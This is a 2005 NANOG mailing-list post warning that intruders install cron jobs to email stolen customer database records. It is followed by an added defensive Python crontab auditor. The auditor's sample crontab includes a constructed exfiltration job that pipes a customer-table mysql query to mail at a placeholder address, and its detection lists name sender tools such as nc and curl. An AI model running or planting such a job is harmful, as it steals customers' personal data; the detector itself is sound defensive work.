Destructive botnet originating from Japan (fwd)

Rob Thomas robt at cymru.com
Sat Dec 24 21:03:27 UTC 2005


Hi again, NANOGers.  :)

I shouldn't have focused solely on the bot issue, sorry.  When
miscreants obtain access to a server through some PHP exploit, they
generally take a look around.  If the web server is also a database
server (eek!), then the real fun begins.  There won't be a noisome
bot placed on that server, oh no.  One crew installed a cron script
to run a SQL query for the new customer data collected in the past
24 hours, then email the query results to the miscreants.  :(

DDoS can be very painful, and it has the side benefit of being very
overt.  It is the more subtle attacks and abuses that might concern
you even more.  It is generally the case that the tools and
techniques for both are the same.

Thanks,
Rob.
-- 
Rob Thomas
Team Cymru
http://www.cymru.com/
ASSERT(coffee != empty);
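
A defender's check for the cron-based data theft described in the message above, as an added example that is not part of the original post: it scans system-format crontab text for jobs that send database client output to a mail or transfer tool, and lists every job owned by a web server account. The sample crontab, the account names and the tool lists are constructed assumptions.

```python
import re

# Constructed sample in system-crontab format: schedule, user, command.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
17 * * * * root run-parts /etc/cron.hourly
0 3 * * * backup mysqldump shop | gzip > /var/backups/shop.sql.gz
5 0 * * * www-data mysql -e "SELECT * FROM customers WHERE created > NOW() - INTERVAL 1 DAY" shop | mail -s report drop@example.invalid
@daily www-data /var/www/html/cache/.c.sh
"""

def _tool(names):
    # Match a program name at a command boundary, with or without a path.
    return re.compile(r"(?:^|[\s|;&(/])(?:%s)(?=$|[\s|;&)])" % "|".join(names))

DB_CLIENT = _tool(["mysqldump", "mysql", "pg_dump", "psql", "sqlite3"])
SENDER = _tool(["mail", "mailx", "sendmail", "mutt", "curl", "wget", "nc", "scp"])
WEB_USERS = {"www-data", "apache", "nginx", "httpd"}  # assumed account names

def parse_entry(line):
    """Return (user, command) for a job line, or None for anything else."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"\w+\s*=", line):
        return None  # blank, comment, or environment assignment
    schedule_fields = 1 if line.startswith("@") else 5
    parts = line.split(None, schedule_fields + 1)
    if len(parts) < schedule_fields + 2:
        return None  # malformed or truncated entry
    return parts[schedule_fields], parts[schedule_fields + 1]

def audit(crontab_text):
    """Return [(line_number, user, [reasons])] for jobs that need review."""
    findings = []
    for number, line in enumerate(crontab_text.splitlines(), start=1):
        entry = parse_entry(line)
        if entry is None:
            continue
        user, command = entry
        reasons = []
        if DB_CLIENT.search(command) and SENDER.search(command):
            reasons.append("db-output-sent-off-host")
        if user in WEB_USERS:
            # A wrapper script hides its contents from this scan, so any
            # job owned by the web server account is listed for review.
            reasons.append("web-user-job")
        if reasons:
            findings.append((number, user, reasons))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_CRONTAB):
        print(finding)
```

Per-user crontabs (for example under /var/spool/cron) have no user column, so they need the owning account supplied separately before this parser applies.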



